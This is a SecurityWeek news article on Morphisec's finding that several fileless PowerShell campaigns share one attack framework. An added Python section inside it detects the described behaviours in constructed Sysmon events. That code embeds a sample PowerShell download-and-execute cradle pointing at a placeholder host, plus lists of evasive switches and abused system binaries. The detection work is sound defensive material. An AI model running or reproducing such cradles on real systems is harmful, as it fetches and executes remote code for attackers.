Recent Fileless Attacks Linked to Single Framework, Researchers Say

A series of “fileless attacks” previously attributed to two different threat actors are now believed to have been carried out by the same actor, using a single attack framework, Israeli security firm Morphisec reveals.

Starting on March 8, Morphisec researchers began investigating a new fileless attack delivered via a macro-enabled Word document attached to a phishing email that targeted high-profile enterprises. Their investigation led them to a sophisticated fileless attack framework associated with multiple recent campaigns.

Last month, Kaspersky Lab uncovered a campaign comprising more than 140 attacks aimed at banks, telecom companies and government organizations in the United States, the United Kingdom, France, Ecuador, Kenya, Brazil, Spain, Israel and 32 other countries. Common to these attacks was the use of PowerShell scripts to keep the malicious code in memory and avoid leaving traces on the compromised machines.

In early March, Cisco detailed a so-called DNSMessenger attack, in which threat actors used a malicious Word document and a PowerShell RAT that communicated with its command and control (C&C) servers via DNS requests. This attack was also completely fileless and went unnoticed by most standard anti-malware defenses.

Another recently spotted fileless attack was installing a PowerShell backdoor dubbed POWERSOURCE onto infected computers, which FireEye linked to a threat group called FIN7. The actor has been targeting organizations in the United States, focusing on personnel that handle filings to the Securities and Exchange Commission (SEC).

According to Morphisec, all of these attacks are linked: each leveraged the same fileless attack framework, which the security company managed to access. In fact, the company says that a single threat group is responsible for all of them.

“Based on our findings, a single group of threat actors is responsible for many of the most sophisticated attacks on financial institutions, government organizations and enterprises over the past few months,” the security researchers reveal. What Morphisec doesn’t say, however, is who these actors are. 

The security researchers even had a brief encounter with these actors, “via the very same PowerShell protocol used for the attack delivery,” which revealed that the operator was part of an organization targeting specific companies. Following the encounter, the cybercriminals shut down the C&C server, which likely cost them their foothold in the systems connected to that server.

Similar to previously described campaigns, the attack uses a weaponized Word document that delivers a PowerShell agent capable of opening a backdoor and establishing persistence. In most cases, the actors then deliver different PowerShell commands through the C&C, depending on the target.

“For some targets, the attack was fully fileless, eventually delivering a Meterpreter session directly to memory. In other cases, the password-stealer LaZagne Project or another Python executable was delivered and executed. After additional investigation, we identified controllers for different protocols including Cmd, Lazagne, Mimikatz and more,” Morphisec explains.

The malicious Word document claims to be protected and asks the potential victim to click “Enable Content” to view it, which allows the macros to run. The macro launches its PowerShell stage through Windows Management Instrumentation (WMI) rather than as a direct child process of Word, a technique already adopted by various malware families to evade detection: the resulting PowerShell process is parented by the WMI provider host (WmiPrvSE.exe), which breaks the Office-to-PowerShell parent/child chain that many detection rules key on.

After several decryption stages, the decrypted PowerShell is saved to disk. The script observed in one attack was found to be an agent capable of receiving commands from the C&C, executing them and returning the results. The malware was also found to lower Office’s macro security setting so that subsequent macro-based documents execute automatically, without the “Enable Content” prompt.
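The two behaviours described above (PowerShell launched through WMI rather than directly by Word, and the macro security setting being lowered) are the points a defender can key on. The following is an added example, not code from the article or from Morphisec: it runs three simple detection rules over a handful of constructed Sysmon-style events (process creation and registry value set), decodes the `-EncodedCommand` payload, and flags `VBAWarnings`/`AccessVBOM` being set to 1 under an Office Security key. The event format, file paths, user SID and command lines are all invented for the example; only the registry key names and the meaning of `VBAWarnings=1` (“enable all macros”) are real.

```python
import base64
import re

# --- constructed sample telemetry (not real logs) ---------------------------
# Simplified Sysmon-like records: id 1 = process creation, id 13 = registry value set.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/stage2')"  # constructed
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()  # what -EncodedCommand carries

SAMPLE_EVENTS = [
    # 1. Word opened from Explorer: benign on its own
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n C:\Users\j\Downloads\invoice.docm'},
    # 2. Naive macro: Word spawns PowerShell directly (classic parent/child chain)
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -nop -c "iex (gc C:\Users\Public\a.txt)"'},
    # 3. Macro calls Win32_Process.Create over WMI: PowerShell's parent is WmiPrvSE.exe,
    #    so the Word -> powershell link is gone and only the WMI host chain remains
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {ENCODED}"},
    # 4. Agent lowers Word's macro setting to "enable all macros" (VBAWarnings = 1)
    {"id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "details": "DWORD (0x00000001)"},
    # 5. Admin restores the default "disable with notification" (2): not a finding
    {"id": 13, "image": r"C:\Windows\regedit.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "details": "DWORD (0x00000002)"},
    # 6. Scheduled maintenance script: not a finding
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# --- detection rules ---------------------------------------------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wmic.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell switches typical of staged in-memory loaders (abbreviated forms included)
EVASIVE_FLAGS = [
    re.compile(r"-nop\b|-noprofile\b", re.I),
    re.compile(r"-noni\b|-noninteractive\b", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    re.compile(r"-e(?:xec|xecutionpolicy)?\s+bypass\b", re.I),
    re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
]
# Per-user Office macro security values; VBAWarnings=1 = run all macros silently,
# AccessVBOM=1 = let code tamper with the VBA project (macro writing macros)
MACRO_KEY = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.\d+\\(?:Word|Excel|PowerPoint|Outlook)"
    r"\\Security\\(VBAWarnings|AccessVBOM)$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_dword(details):
    """Extract the integer from a Sysmon-style 'DWORD (0x...)' Details field."""
    m = re.search(r"0x([0-9A-Fa-f]+)", details)
    return int(m.group(1), 16) if m else None


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Return (rule, detail) tuples for events matching the three behaviours."""
    findings = []
    for ev in events:
        if ev["id"] == 1:
            parent, child, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
            if parent in OFFICE_APPS and child in LOLBINS:
                findings.append(("office_spawns_lolbin", f"{parent} -> {child}"))
            if parent == "wmiprvse.exe" and child in ("powershell.exe", "pwsh.exe"):
                flags = sum(1 for p in EVASIVE_FLAGS if p.search(cmd))
                findings.append(("wmi_spawned_powershell",
                                 f"{flags} evasive switches; decoded: {decode_encoded_command(cmd)}"))
        elif ev["id"] == 13:
            m = MACRO_KEY.search(ev["target"])
            if m and parse_dword(ev["details"]) == 1:
                findings.append(("macro_security_lowered",
                                 f"{m.group(1)}=1 set by {basename(ev['image'])}"))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Run stand-alone it reports three findings (the direct Word-to-PowerShell launch, the WMI-parented PowerShell with five evasive switches and the decoded download cradle, and `VBAWarnings=1` written by PowerShell) and stays silent on the two benign records. The point of rule two is that a rule which only looks for Office as the parent of PowerShell (rule one) misses the WMI variant entirely; in a real deployment the WmiPrvSE rule will also fire for legitimate management tooling, so the evasive-switch count and the decoded payload are what separate noise from the agent described in the article.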

“In the course of our research the attacker briefly interacted with us. It was clear that a person from the other side was waiting to connect on his Meterpreter session. During the brief interaction, our researchers tried to identify the actor. The attackers immediately blocked the connection and later shut down the C&C server entirely, thereby losing their foothold in the systems of victims connected to that communication server,” Morphisec says.

The security researchers note that fileless attacks are on the rise and could prove a bigger problem than currently believed. Because the malware resides solely in memory and commands are delivered directly from the Internet, there are no executables on disk for file-based scanning to find, making the attack very hard to detect with conventional anti-malware tools.

Related: Cybercriminals Target Employees Involved in SEC Filings

Related: Researchers Uncover Sophisticated, Fileless Attack

Related: Legitimate Tools Abused For Fileless Infections

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
